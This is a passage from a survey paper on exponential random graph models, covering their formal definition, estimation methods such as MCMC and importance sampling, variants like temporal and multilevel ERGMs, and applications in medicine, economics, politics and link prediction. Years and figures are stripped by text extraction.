erdös & rényi ( ) was mostly on independent tie formation between two nodes. in ergms, more complex structures with a reasonable level of dependence have also been taken into account. this approach has led to more complicated models which also require more sophisticated learning methods. additionally, due to the better accuracy of the models with dependent structures, they are applicable to a more considerable extent of the problems. therefore, there is a rising interest in using ergms in multiple research areas. previous surveys (anderson, wasserman & crouch, ; pattison & wasserman, ; robins, pattison & wasserman, ; goodreau, ; robins et al., a; robins et al., ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. b; fienberg, ; goldenberg et al., ; chatterjee & diaconis, ; chatterjee, ) have introduced most of the articles up to . there have also been two novel surveys in (amati, lomi & mira, ; van der pol, ) with a focus on the theory and applications of ergms. however, there is a relative paucity of studies investigating ergms seminal and new methods together. in addition, to the best of our knowledge, no research has been found examining applications of ergms in different fields and contexts in the way that we have done. we believe that this review paper can help the scholars of different disciplines to better recognize the recent applications of ergms in their specific field of interest. certainly, here is still room for more applications of ergms in other fields which are yet to be discovered. there are also some other generative models for network generation such as the use of the neural network for graph generation (bojchevski et al., ; you et al., ) and stochastic actor-oriented models (snijders, ). however, to the best of our knowledge, ergms are one of the oldest methods that have been extensively used in the literature up to now. several statistical learning methods have been used for ergms parameter learning. in this article, we have addressed the following: • importance sampling • stochastic approximation • some of the newly presented methods. we have introduced some applications of random graphs in the following categories: • medical imaging • healthcare applications • economics and management • political science • missing data and link prediction • scientific collaboration • wireless networks modelling • other applications. also, some useful tools and libraries have been introduced for the estimation of ergms: • pnet • r package statnet • bergm. ‘survey methodology’ is a brief description of the methodology we used to find the articles that we believed are related to the topic of this manuscript. in ‘precise definition of ergms’ we are going to give a formal definition of ergms for the readers who are new to this concept. for experienced researchers in the field, this can be used as a refreshment. hence, in ‘methods for estimation’, most of the state-of-the-art works for ergms estimation methods have been discussed. ‘preliminaries’ is a review of ergms’ applications ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in multiple fields. in ‘applications of ergms’, we have introduced some of the state-of-the- art new libraries and tools for ergm estimation. ultimately, in ‘conclustion’, we conclude what we had said and also give some ideas for future works in the world of ergms. survey methodology for the purpose of finding related research articles we used two different approach. . searching related keyword in the google scholar search engine. . starting from an initial pool of articles and then move back and forth between their citations and references. in the first approach we search related keywords like ‘‘ergm’’, ‘‘exponential random graphs’’, ‘‘exponential random graph models’’ in the google scholar search engine and extracted related articles by reading their abstracts. in the second approach which was our main methodology throughout the work we initiate with a number of seminal works which were found by one of the following ways. . being introduced by experts in the field. . extracted from the well-known surveys (anderson, wasserman & crouch, ; robins, pattison & wasserman, ; pattison & wasserman, ; goodreau, ; robins et al., a; robins et al., b; fienberg, ; goldenberg et al., ; chatterjee & diaconis, ; chatterjee, ; amati, lomi & mira, ; vander pol, ) and the well-known book (lusher, koskinen & robins, ). . papers extracted from the first approach which had a good citation count or were published in journals with high impact. after finding the initial seed of articles by one of the mentioned methods we checked the related publications that they have referenced and the publications that they have been cited from them. we continued until there were no more related articles. in situations which there were too many related articles our selection criteria were mostly based on the citation count and the journals’ impact factor. precise definition of ergms in this section, we give a brief overview of the overall ergm scheme. according to snijders et al. ( ) and robins et al. ( a), the first work that categorized ergms as a separate field of study was (frank & strauss, ). although it was named as markov graphs at that time, basically it had the same characteristics. an interested reader can refer to robins et al. ( a) and lusher, koskinen & robins ( ) for more details on both the history and mathematical background of this topic. in an ergm, each graph is associated with a probability. this probability indicates the possibility of the presence of that particular graph in the probability distribution of a class of graphs. there are also two other essential elements in ergms known as graph configurations and their corresponding parameter. each configuration or statistics (we will use both names throughout the text) is composed of some nodes and ties repeated in the graph. for example, a triangle consisting of three nodes and edges can be assumed as a configuration. the authors of the seminal work (frank & strauss, ) were the first who ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table notations used throughout this work. notation meaning x the set of all possible graphs with the same number of nodes. x the variable that indicates the presence of a particular graph from the distribution. p the probability distribution function of graphs. s the set of all network statistics presented in the model. s some particular statistics of the network. c the set of all count function of the network configurations. c the count function of some particular statistics of the network. the set of all network statistics coefficients. θ some particular statistics’ coefficient of the network. n the normalizing factor, the sum of all configurations. argued that these configurations can be considered as sufficient statistics for a log-linear mode. sufficient statistics are features of a i.i.d dataset which are sufficient for modeling the distribution probability of the data such that adding another feature does not add any more insight to the model (ra fisher, ). so, ergms are a representation of the graphs by their configurations. a particular exponential function is defined to represent the relationship between these configurations and the probability distribution of the graphs. this formula is a variation of logistic regression which is extended so that it would handle the dependent variable rather than only being applicable to independent variables which are the case for logistic regression (lusher, koskinen & robins, ). we will use the notations presented in table throughout our work. note that throughout this work, the representation of the graphs is in the form of the adjacency matrix. for example, in a matrix x if xij = it indicates that there is an edge between i and j, while if xij = no edge exists between these two nodes. using the introduced notation of table , the ergm probability function can be expressed as follows: p(x =x|θ)= n exp { θ c (x)+θ c (x)+...+θpcp(x) } ( ) n is the normalizing factor which is the sum of the probability of all possible graphs computed by eq. ( ), whose formula is as follows: n = ∑ x∈x exp { θ c (x)+θ c (x)+...+θpcp(x) } ( ) if we summarize the results, this leads to: p(x =x|θ)= n exp { θ t c(x) } ( ) n = ∑ x∈x expθt c(x) ( ) ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. it can be seen in the eq. ( ) that the network configurations are the building blocks of the ergm formulation. choosing the correct configurations with the right relation to the network context is central for to the correct estimation of the graphs’ distribution. there are two types of network statistics: ( ) statistics based on the edge formations, ( ) statistics that are based on the node attributes. in the rest of this section, we are going to introduce some basic network configurations (snijders et al., ; robins et al., a) which have been used in the literature. structural configuration refers to the statistics that depend solely on the structure of the graph. note that their usage is not dependent on the network context and can be applied to any networks. these structures are different in undirected and directed networks. some structural configurations that are widely used for undirected and directed graphs are presented in (tables s and s ), respectively. although use of nodal configurations in our model will cause to be more dependent on some specific context, sometimes it is still useful to leverage this kind of network attributes. the reason is that, in many networks, there is a treasure of useful features in the node’s metadata and it is not wise to ignore them as one of our model features. some descriptions of nodal configurations that are widely used for undirected and directed graphs are reported in (tables s and s ), respectively. according to morris, handcock & hunter ( ), there should not be a linear dependence between the configurations that are used in a model. it is due to that fact that the configurations with linear interdependence with each other cannot add any new benefit to the model and only make the model more complicated. snijders et al. ( ) gave a generalization of ergms and also introduced some new configurations. since then, it has been extensively used in other works. here we present a brief description of each of them. geometrically weighted degree counts (gwdc): this measure is an extension of the nodes’ degree combined with geometrically degree discounts in the computation of the statistics, which is expressed as the following expression: gwdc(x)= n− ∑ k= e−αkdk(x) ( ) in this equation, x is the matrix we want to compute its corresponding gwdc value and n is the number of nodes in the graph. dk represents the number of nodes with degree k. also, α is a decaying factor which ensures that the nodes with higher degrees have higher impacts. geometrically weighted stars counts (gwsc): this measure is an extension of star counts combined with a combination of geometrically degree discounts in computing the statistics, which is expressed as the following expression: gwsc(x)= n− ∑ k= (− )k sk λk− ( ) ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. (d)r =d(d+ )...(d+r− ). in this equation sk is the number of stars with the k number of edges (k-stars). also, λ denotes a decaying factor which ensures that the stars with a higher degree have a greater impact. sum of ascending factorial degrees (safd): first presented in handcock & jones ( ), it is a variation of yule distribution using the sum of ascending factorials of degree : safd(x)= n∑ i= ( yi++c ) r ( ) transitivity by altering k-triangles (tat): this measure is an extension of triangle counts combined with geometrically discounts in the computation of the statistics, which is expressed as the following expression: tat(x)= t − t λ − t λ −...+(− )n− tn− λn− ( ) in this equation, tk is the number of k-triangles. λ represents a decaying factor which ensures that the triangles with a higher degree have a more substantial impact. figure s displays a description of k-triangles. altering independent two-path (ai p): this measure is an extension of -path with a combination of geometrically discounts in the computation of the statistics, which is expressed as the following expression: ai p(x)=u − λ u + n− ∑ k= ( − λ )k− uk ( ) in this equation, uk is the number of star k-independent -paths. λ represents a decaying factor which ensures that the triangles with higher degrees have higher impacts. in figure s , you can see a description of k-independent -paths. the authors of wilson et al. ( ) addressed one of the significant drawbacks of ergms. as can be seen in tables s and s , the weights of the graphs are missing. in other words, they are only applicable to unweighted graphs, and if we want to use them in the context of the weighted graphs, their weights should be omitted. however, much useful information underlies the weight of the graphs and for most of the domains it is crucial to consider them to accurately model the graph. following this idea previously discussed in desmarais & cranmer ( ) and krivitsky ( ), they continued to design more flexible estimation methods for the so-called generalized ergms (gergm). their method can handle a wide range of graphs’ statistics with continuous-valued edges. the endogenous statistics need to be selected before implementing the model. therefore, there must be several assumptions about choosing a particular statistic. although the process of finding the best statistics for the model is highly empirical, considerations when making a hypothesis about the network’s configurations is important. the choice of a specific statistic is highly dependent on the assumptions we have about network phenomena. simple structures like the number of edges and nodes take control of the size and sparsity of the graph. in a friendship network, triangles can indicate the inclination of mutual friends becoming friends with each other. in a citation network stars refers to ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. a large number of central nodes (van der pol, ). the dyadic dependence assumption between nodes should also be considered while choosing the proper statistics for the model. dyadic dependence is the dependent processes among two dyads. a dyad in this context refers to a pair of nodes and their relation. the dyadic dependence among processes could arise a number of problems like model degeneracy, for more information see handcock et al. ( ). new specifications like geometrically weighted degree counts and altering k-triangles have been introduced to alleviate model degeneracies resulted from dyadic dependence. this is achieved by increasing the stability of the model with weighting the low density and reducing the weight for higher degrees to avoid the degeneracy (snijders et al., ; van der pol, ). methods for estimation one crucial step in the ergms models is to fit the coefficient of the model to the observed data after designing the model with desired configurations. multiple methods exist for this purpose. nevertheless, the overall approach in all of them is developing a likelihood function based on the ergm formulation and then solving it with some of the mathematical methods that exist for maximum likelihood estimation (mle). note that all of the mle solution methods should be specialized for the ergm modeling. after introducing the general form of the mentioned likelihood function, we are going to present a brief description of some of the methods for solving it already presented in the literature. a form of the likelihood function we aim to find the best values of theθ vector in eq. ( ) which maximize the probability over the observed data. in a more formal expression, we want to solve the following equation: θml :=argmaxθ∈rk p(x|θ) ( ) where, p is the same probability function as the eq. ( ) and, rk represents all possible real values over a k-dimentional space. note that the θ is a vector of coefficients rather than a single value; thus, its space value should be a vector space. different methods exist for solving such equations. here, we are going to name a few of them which are mostly used in the ergm related works. also, we intend to present a number of state-of-the-art methods that have been presented after . preliminaries sampling methods there are two important applications of sampling methods in the ergms parameter estimation model: • in all methods, there is a need to simulate graphs from the fitted model or simulate some graphs to gain more insight into the distribution of the graphs and their configurations (lusher, koskinen & robins, ). this distribution is also used to test whether the distribution of the fitted model is close to the observed data or not. • predicting the prior distribution of the graphs for bayesian learning models ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. make a change to the graph from previous state start with an initial graph (usually empty graph) generate probability results based on the graphs statistics choose between the current graph or the graph from the previous step done not enough samples enough samples figure finite state automata of a mcmc procedure. full-size doi: . /peerjcs. /fig- so, there is a need for sampling methods to draw a sample from the given graph distribution. in this section, we present some of the sampling methods that have been used extensively in the literature. monte carlo markov chain sampling method which is abbreviated to mcmc (metropolis et al., ) is a well-known sampling method which has been used in many works. here, we only discuss it in the context of graph generation. in this method, we start with an initial graph which can also be an empty graph. then, in each iteration, a new graph is generated by making a small change to the graph from the last step. the form of this ‘‘change’’ is different from work to work. the most straightforward change is adding or removing a tie. the procedure is as follows: two nodes are chosen randomly. after which the state of their connection is altered (if they are already connected, they become disconnected while if they are not connected, they become connected.). in the next step, the probability of the generated graph is computed according to eq. ( ). this probability is compared to that of the graph generated in the previous step. then, we accept or reject the new graph based on the comparison of these two probabilities. if the new graph is more probable, it is more likely to substitute the old graph in the next iteration. the probability of whether the new graph is chosen for the next iteration or the graph from the last step is re-chosen depends on which one of them has a higher probability score in eq. ( ). note that only having a higher probability score is not a guarantee that the graph gets chosen. it only increases the chance of selection. all these outlined the scheme of all mcmc methods. however, the details including how many of ties are altered in each iteration or the probabilistic selection between the old graph and the new one are different in literature. we intend to present a quick introduction to the metropolis-hasting sampling methods which is mostly used in ergm related literature. figure displays the overall procedure of an mcmc method. metropolis-hasting metropolis et al. ( ) is the most widely used mcmc derivation in ergm studies. metropolis hasting in the context of graph generation is as follows. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. simulate the distribution of the graphs based on that parameter start with an initial parameter vector find the difference between the observed data and the simulated distribution choose between the current graph or the graph from the previous step done figure procedure of fitting ergms variables. full-size doi: . /peerjcs. /fig- initially, as we explained in the general mcmc scheme, we start with an empty or random graph. our goal is to generate n samples from the distribution of graphs, implying that we want to generate a sequence of x ,x ,...,xn graphs. we choose two random nodes at each step and change the tie situation between them. the probability of the newly generated graph and the graph from the last step is then computed using the following formula: min { , p(x =xnew|θ) p(x =xn− |θ) } . ( ) this formula computes the probability of whether to accept the new move or substitute the last step graph as the new one. classic methods so far, we have reviewed the necessary preliminaries. now, we can review the most widely used methods in the literature for estimating the value for statistical parameters (θ in eq. ( )) best representing the observed data. in other words, our aim is to solve eq. ( ). most of the methods use the following steps: initially, they start with an initial value for the parameter vector. then, the distribution of the graphs is generated by one of the sampling methods. next, the difference between the distribution and the observed data is computed (eθ(c(x))−c(xobserved). if the difference is satisfactory, the learning process is halted and the current vector of the parameter is considered as the final answer which best fits the observed data; otherwise, based on the learning method the algorithm moves to the subsequent values of θ and goes back to step . figure demonstrates the finite automata of this method. the ultimate goal of all learning methods is to find a vector of θ values in eq. ( ) that can also generate graphs which are similar to the observed graphs. to this end, different learning methods exist and this section describes the most important of them namely importance sampling and stochastic approximation. we used the description presented in lusher, koskinen & robins ( ). ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. importance sampling the goal as we said is to minimize the expected value of θ which minimizes the expected value between observed statistics and the ones generated by the ergm model. the aim is to use maximum likelihood that we discussed before to find the best value of vector θ which maximize the right hand side of eq. ( ). one possible approach is to search over all possible θ values in the search space and try them one by one. but since the search space is very large and θ values are continuous this approach is not practical. instead of such brute force algorithm, one of the methods for ergms parameter estimation is the one inspired by the general framework ml estimation method for dependent data introduced by (geyer & thompson, ). the main idea is to instead of generating the whole possible graphs of a particular θ vector, we can draw a large sample of the graphs and consider it as a representation of the whole possible graphs at each iteration. this sample is generated from the current value of the θ vector using the eq. ( ) and is used in the formula to compute eθ(c(x)) and then compute how much the value eθ(c(x))−c(xobserved) is close to zero. at each iteration an average over the generated graphs statistics is computed to measure eθ(c(x)) and decide whether to continue the estimation or not based on how much the eθ(c(x))−c(xobserved) is close to zero. other than the mentioned halting situation we need an algorithm to move from each θ vector to a new one (if the halting is not satisfied). a newton-raphson formula is used to move from one statistic to another. for more detail on the mathematical details of the sampling and the used newton-raphson based method see (lusher, koskinen & robins, ). stochastic approximation the this model presented in snijders ( ) can handle both bimodal and multimodal and enhance the speed of convergence. they also used the newton-raphson method for the learning step of the algorithm. as mentioned in lusher, koskinen & robins ( ), they used a three-step method. at phase one, a limited number of iterations is performed to determine initial values of the algorithm. in the second step, the newton-raphson algorithm is employed to optimize the answer. finally, the convergence criteria are checked. newly presented methods for ergm estimation in byshkin et al. ( ), the authors improved the mcmc sampling part of the ergm estimation by adding an auxiliary parameter to the model. in their method, which they called improved fixed density (ifd) mcmc sampler, they tried to decrease the state space of the network to reduce the time complexity of the algorithm. this new auxiliary variable which was based on the number of ties helped the model to converge faster without the need of making the mcmc overall model more complicated. in some works like (stivala et al., ), snowball sampling (coleman, ; goodman, ) was used to overcome the computational complexity of the mcmc method over large network datasets. as mentioned earlier, the bayesian estimation of the parameters requires prior knowledge about the network posterior distribution. however, this posterior probability distribution ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is not always easily available. to overcome this issue, (bouranis, friel & maire, ) introduced a pseudo-likelihood estimation approach by replacing the posterior distribution with a more achievable pseudo-distribution. although this method resulted in faster computation of the likelihood function, as mentioned in the (schmid & desmarais, ), its results are not still as precise as they should. to handle this problem, the same mentioned article introduced another pseudo-likelihood estimator based on the bootstrapping parameters which culminated in more accurate convergence. in a recent work (bouranis, friel & maire, ), the authors proposed yet another heuristic model based on pseudo-likelihood estimation. they did so by performing three adjustments to the pseudo-likelihood function: ( ) mode corrections to overcome the bias of the pseudo-likelihood function; ( ) curvature adjustment, which is a modification in the selection of the transformation matrix and the corresponding hessian matrix; and ( ) magnitude adjustment, which is a linear transformation to scale the curvature-adjusted pseudo likelihood to the right values. despite all the progress in the ergms parameter estimation and modeling, it is still a hard task in large graphs. thiemichen & kauermann ( ) addressed two of the main challenges of ergms, including the instability of the model especially in the models with more straightforward statistics like triangles and the time-consuming nature of the ergm parameter estimation procedure due to large number of numerical simulations. for solving the first problem, they proposed a technique to produce smooth stable statistics. further, to overcome the second issue, they employed a novel subsampling model which instead of fitting the model to the whole network it only fit the model to subgraphs from the network and then aggregated these sample estimates. the two mentioned ideas yielded a significant improvement for modeling large graphs. ergms variations apart from the basic definition of ergms there are also some other variations of ergms. each year a number of new extensions of the original ergm definition are introduced. in this chapter we introduce three of the most widely used ergms variations. evolution of networks in dynamic environment like social networks has attracted scientist to make an extension of the ergms called temporal ergms a.k.a. tergms which is capable of capturing the information underlying dynamics of such networks (hanneke et al., ). a markov assumption between snapshots of the network at each timestep is taken. then the model is created based upon the relation between each two consecutive snapshots st and st− . p(x =st|st− ,θ)= n(θ,st− ) exp { θ t ,ψ(st,st− ) } . ( ) as it can be seen in eq. ( ) most parts of the formula for tergm is similar to normal ergm. however, the time snapshots are now considered and each new time snapshot st is dependent to its previous one st− . also, the normal count of the networks statistics has been substituted with temporal potential count ψ over two consecutive snapshots. for more information see hanneke et al. ( ) and for the information about the btergm which is a library for temporal ergms see leifeld, cranmer & desmarais ( ). ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. most of the real-world network are associated with a value on their edges which are referred to as weighted graphs in graph theory. a plethora of researches have been done to consider these types of networks into the ergm general schema. gergm (desmarais & cranmer, ) and the model proposed by krivitsky ( ) are the two most well- known models which have incorporated the networks’ edges’ weights into the model. the normalizing factor in eq. ( ) which is the denominator of eq. ( ) is not assured to be convergent when the network statistics (c(x) in the eq. ( )) are infinite set like continuous valued edges. gergm is a model aimed to overcome this issue by using a probability model for such continuous values. they build a transformed version of the original ergm formula that no longer suffers from the mentioned problem. the krivitsky ( ) have also extended the previous binary version of ergm which only models edges existence rather than their value into a model which is capable of capturing the information of weighted graphs. however, his method is restricted to natural valued weights on the edges. in network science there is a special kind of networks called multiplex or multilayer networks. these are networks which their nodes are connected in the context of more than one attribute. for example, in a social relation network, actors might have several relations between them like friendship network or co-working network. each of these relations can be abstracted as a layer in a network model. also, in some situations, there is a hierarchical structure in the data like modeling the relations inside a university. there are schools, which are divided into groups and lecturers and students. an extension of ergm which is applicable to model such scenarios in multilevel networks is proposed for these networks (wang et al., ). they considered relation between the nodes in each level and also the inter-level relations into the model. for example, consider a two layer network with layers a, b and an imaginary layer between them called x which is for the purpose of modelling inter-level relations between a and b. then the eq. ( ) is re-written as: p(a=a,x =x,b=b|θ)= n exp{θta ca(a)+θ t b cb(b)+θ t x cx(x)+ θ t a,xca,x(a,x)+θ t b,xcb,x(b,x)+θ t a,b,xca,b,x(a,b,x)} ( ) which the θta ,θ t b ,θ t x ,θ t b,x,θ t a,x,θ t a,b,x are the parameters for statistics which are extracted from layers a,b and the inter-level relations a,x and b,x and the inter-level relation of layers a,b. the same is true for the count functions of the statistics. θ is the set of all types of statistics. applications of ergms as mentioned previously, ergms are a useful tool for scientists from various disciplines. networks are everywhere, and anywhere that they exist they can be analyzed using ergms and other statistical models. note that here we have mostly reviewed the works since . medical imaging in order to take care of the limitations of the descriptive analysis of brain neural networks, the author of sinke et al. ( ) used ergms to be able to model the observed network using the joint contribution of network structure. they also compared the changes in brain ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. networks statistics across different ages. this study was conducted to examine the effects of aging during lifetime in the brain global and local structures. graphs where extracted from brain images obtained from diffusion tensor imaging (dti). four network statistics were used to model these networks: • the number of edges • the geometrically weighted edgewise shared partner (hunter, ) • the geometrically weighted non-edgewise shared partner (hunter, ) • the hemispheric node match: a binary indicator which shows whether two nodes are in the same hemisphere of the brain. the bayesian learning schema from caimo & friel ( ) was used to fit the model. in a recent work, (dellitalia et al., ) employed ergms to study the structure of neural networks of the brain. they aimed to increase the chance of unconscious and injured patients to recover by analyzing brain functional data. in their work, they overcame four shortcomings of previous methods by incorporating ergms into their study. for example, one of them was the ability to assess the dynamics of the network over time.they used the separable temporal ergms (tergm) (krivitsky & handcock, ) for their modeling. one of the aspects of their work that successfully handled with ergms was that the network structures they chose should have not been necessarily independent. this restriction was one of the main drawbacks of previous methods. functional magnetic resonance imaging or fmri is a method for observing brain activities and their changes over time. there are components in the fmri images which can be explained using network analysis methods. nodal signals, network architecture, and network function are the three essential network properties in building fmri-based networks (solo et al., ). ergms are one the main important network analysis methods which have been used to explain such networks. the authors of a review paper (solo et al., ) introduced the most critical efforts with the aim to explain these brain networks. note that there are plenty of works which used ergm as their method (simpson, hayasaka & laurienti, ; simpson, moussa & laurienti, ). healthcare applications having a healthy life is one the central concerns of human life. if we look at this issue from a macro perspective, we can see that many health-related problems can be alleviated by analyzing their corresponding inter-related actors. for example, in epidemiology, there is a direct connection between the patient relationships and the extent that the disease can spread. in most cases, these relations between the actors will result in the formation of a network. this network can be analyzed using ergms to answer different questions underpinning its formation and dynamics. this kind of analysis is something that has already been done extensively by researchers in the healthcare community. analyzing inter-hospital patient referral network is a significant problem which (caimo, pallotti & lomi, ) has recently investigated using ermgs. they used a combination of the edges and nodes of the network and utilized the bayesian approach introduced in ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. caimo & friel ( ) to fit their model. this task was done using bergm (caimo & friel, ) r language package for their implementation. another work (baggio, luisier & vladescu, ) shed light on the relationship between social isolation and mental health. the connection between these two subjects was investigated by analyzing the network of romanian adolescents using ergm modeling. they concluded that there is a strong link between the two mentioned concepts. application of statistical network in epidemiology and disease spreading is another interesting topic which has attracted from the attention of the biological science community. (silk et al., ) provided an important opportunity to advance the understanding of the pattern and evolution of infections in static and dynamic environments. they also used ergms for their models. in their ergm model, they employed a fair number of both structural and node-based attributes. the ergm (hunter et al., ) r language package was used for the tests. social ties can reveal a wide range of aspects of human life. the networks formed by such ties and edges among individuals can transfer life habits and behaviors in a society. for example, in many kinds of literature, the relationship between social tie and analysis of obesity has been investigated. zhang et al. ( b) thoroughly studied the articles related to applications of social network analysis to obesity. in another work related to eating disorders, (becker et al., ) have presented some findings using ergm network analysis about the relationship between the eating disorders and human relationships. they conducted their study on members of a sorority at southeastern university. economics and management marketing organizations that are responsible for promoting tourist destination have also been analyzed using ergms. (williams & hristov, ) intended to study the networks underpinning destination marketing organizations (dmos). they developed four models with the most complex one consisting of the following statistics: • number of edges • the geometrically weighted edgewise shared partner (hunter, ) • properties of membership and industry background. global migration and different attributes of immigrants can be considered as a network. there are many theories on how these networks shape and evolve and how they depend on immigrants and country backgrounds. ethnicity, wealth, religion). (windzio, ) applied ergm in order to examine theories and hypotheses about creation and evolution of these networks. he used both the graph structure and node attributes in a large number of statistics. global tourism and its corresponding network, global tourism network (gtn), is yet another field of study, given the tremendous financial importance of tourism market. as mentioned in lozano & gutiérrez ( ), it is essential to gain insight into the connections between its components. in the same article, an ergm approach was used to find the critical local substructures of the gtns. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. handling the budget and resources during crises is always a challenging task for humanitarian organizations. there is a need for a tradeoff between the use of asset supplies for the current crises and the usual ongoing projects. this problem has been formulated in the form of asset supply networks. stauffer et al. ( ) used ergms as an empirical model to understand the asset flows during a crisis. the applications of ergms have even been extended to the analysis of online drug distribution networks. in a recent work, (duxbury & haynie, ) conducted the mentioned research on a dataset of an online drugstore on the dark web. they studied such networks concerning their topological dynamics, suppliers, and customer demand as well as the resistance of such networks to disruptions. does economic partnership between professionals will result in further trust and solidarity? this is the central question of bianchi, casnici & squazzoni ( ). they developed an ergm multiplex network model collaboration network and a number of other attributes and then analyzed it using multivariate ergms to examine social support and trust for each of the network statistics. political science a large number of articles in the political science community have used ergms for their modeling. this enthusiasm toward ergms among political science scholars well suggests that it is among the most famous mathematical modeling in the field. here we introduce a handful of these articles. sustainable development policy is a major concern both for the government and the private sector. it is only achievable by interaction among individuals. in particular, the role of the connection between funding sectors and those in need of money is important for carrying out their projects. this is the central problem of gallemore & jespersen ( ). the dataset consisted of donor organizations. the role of ergm in this work was modeling the donor agent relationship networks. another major issue that has been addressed through ergms is collaborative governance between different sectors and individuals of multiple organizations. in ulibarri & scott ( ), the authors used ergm to test their hypothesis about what should be observed in low-collaboration vs. high-collaboration networks. four simple ergms’ configurations were used, including: • the number of networks ties • the number of nonzero ties • the number of reciprocity relations in the network • the number of transitivity relations in the network. in a more recent work, (scott & thomas, ) addressed the same problem. however, they used different datasets and network statistics. hamilton & lubell ( ) also took the same ergm modeling approach in discussing the collaborative governance, in the special domain of climate change adoption. in an exciting work, li et al. ( ) investigated the effectiveness of military alliances in making peace between states. they used temporal random graph models for longitudinal ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. network data of alliance. they employed two different sets of network statistics and developed two models upon them. communications via internet social networks have helped the human to take a huge step further. people from multiple backgrounds and societies are engaged in conversations that have never been possible before the widespread popularity of online social networks. in the case of political conversations in social networks, there is always the dilemma whether this freedom has resulted in more communications between people with different ideologies or adversely it will cause people with same viewpoints tend to dominate most of the conversation thereby self-reinforcing the same way of thinking. (song, cho & benefield, ) addressed this issue by studying the network of message selection of users during a presidential election and then analyzed the mentioned network by a temporal ergm (termg) to answer the questions above. the world trade network has also been investigated via tergms. pan ( ) studied these networks to answer the underlying questions about them and their effects on related subjects. even further, some works such as chen ( ) took the use of ergm networks in modeling political networks a step further by incorporating multilayer networks properties into their models. he proved with experimental results that this multilayer approach toward ergms could better fit the model to the observed data. the analysis and challenges of power transition in a personalized authoritarian system is a problem that has been discussed in osei ( ) using ergm modeling. in addition to qualitative methods, the author employed ergm as a quantitative method to answer questions about the regime survival of the regime under the mentioned situations. the network in this context consisted of elite interactions network in authoritarian countries. they found that many of the important people in the past ruler administration still play a crucial role in the current government. environmental treaties among governments play a vital rule in solving environmental issues. however, coming to an agreement in such commitments is not straightforward. the aim of campbell et al. ( ) is to study the model of ratification in such treaties among different parties or states. the main contribution of this research is to find out how the influence network between countries can affect the interdependency of countries decisions on environmental politics. to this end, they have used bipartite longitudinal influence network (blin) model to extract two latent influence network using which show negative and positive influence among different countries. later these two networks have been analyzed using ergms to find the effective contextual and structural network statistics on the shaping of influence (negative or positive) networks (marrsetal, ). network of international arm trade is yet another subject that has been studied using ergm simulations (thurner et al., ). the structure of weapon exchanges network between countries and alias is very complicated. a plethora of effective factors are effective in the formation of the network. economic enhancement of the seller and the desire to strengthen they allay in different regions of the words are two important considerations from the dealers. their datasets are extracted from available data of arm deals after world war ii. temporal ergms were used for during the analysis. they have used a number of statistics based on their hypothesis about importer and exporter effects, size of the ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. countries’ domestic economic markets, national material capabilities, conflict involvement joint membership in defense agreement, geographic distance between two countries. most of the statistics used in this work were exogenous statistics. missing data and link prediction link prediction is the problem of finding missing links in a network. as we explained, ergm deals with estimating graph distribution and generating a new graph based on them. graph generation part is the exact process of finding missing links. however, in link prediction, we do not want to estimate the whole graph distribution, and we desire to find the probability of link formation between two nodes based on the current structure of the graph. smith ( ) used ergms to create a global view of networks with missing data based on sampled data. in their approach, they took sampled ego networks and tried to estimate features of the whole network. the interesting fact about this work was that not both the structure of the network and its size were unknown. a three-step algorithm was used, and in the last step, the aim was to predict the global structure of the network from the fitted model. two real-world network data were used in the tests including addition of health network and sociology co-authorship network. koskinen et al. ( ) used the same approach of leveraging ergm for data augmentation in graphs with missing tie variable. in an empirical test, they were able to estimate the missing tie variable of a network with % missing tie with fair precision. as the article name suggests, they used a bayesian estimation method for fitting the parameters of their model. zhang, zhai & wu ( ) applied ergms for predicting links in microblogs. they used five kinds of graph statistics with four of them ( – ) introduced in hunter ( ): • number of edges • gwidegree (geometrically weighted indegree): the weighting indegree of the network. • gwidegree (geometrically weighted outdegree): the weighting outdegree of the network. • gwodegree (geometrically weighted dyadwise shared partner): the number of shared nodes of all node pairs in the network. • gwesp (geometrically weighted edgewise shared partner): similar with gwdsp, it is the number of shared nodes for linked node pairs in the network. the link prediction based on the ergm method introduced in this article is an iterative approach. at each step, they compute the conditional probability of adding an edge between two arbitrary nodes having the observed part of the network. this process is performed several times through an mcmc simulation, and at last the average of all these steps is computed: p ( xij = |x c =xc ) = n exp ( θ t c ( xij = ,x c)) ( ) in 